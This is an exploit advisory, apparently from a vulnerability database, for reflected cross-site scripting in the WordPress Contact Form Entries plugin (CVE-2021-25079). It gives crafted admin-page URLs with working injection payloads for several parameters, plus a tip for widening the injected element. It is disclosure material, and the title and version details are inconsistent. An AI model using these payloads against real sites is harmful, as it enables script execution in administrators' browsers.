WordPress Contact Form Entries Cross Site Scripting

2022.01.11
Credit: gx1
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting. # Date: 22/12/2021 # Exploit Author: gx1 <gaetano.perrone[at]secsi.io> # Vulnerability Discovery: Gaetano Perrone (aka gx1) # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.2.4 # Tested on: any # CVE : CVE-2021-25079 # References: * https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63 * https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/ # Description: Several params of vxcf_leads administrator page are vulnerable to a Reflected Cross-Site-Scripting vulnerability. # Proof Of Concept: The following request: --------------------------------------------------------------------------------------------------------------------------------------- GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+ --------------------------------------------------------------------------------------------------------------------------------------- returns the list of saved entries in the database. form_id value is reflected in <input> tag. form_id parameter is not sanitized, so it is possible to inject arbitrary values. The following request: --------------------------------------------------------------------------------------------------------------------------------------- http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ --------------------------------------------------------------------------------------------------------------------------------------- Allows to inject onmouseover inside the input form. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- <input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label> ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- By moving the mouse inside the click element, the vulnerability is triggered. Even if the vulnerability seems to require the user to move the mouse on the input element, it is possible to improve the attack by just injecting a “style” section that expands the input element with large width and height. In this way, when the user clicks on the link, javascript code is executed. status param is vulnerable to most dangerous XSS attack: just sending the following request ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- will execute XSS vulnerability. order, orderby and search parameters are also vulnerable to XSS: ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # Solution: Upgrade Contact Form Entries to version 1.2.4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top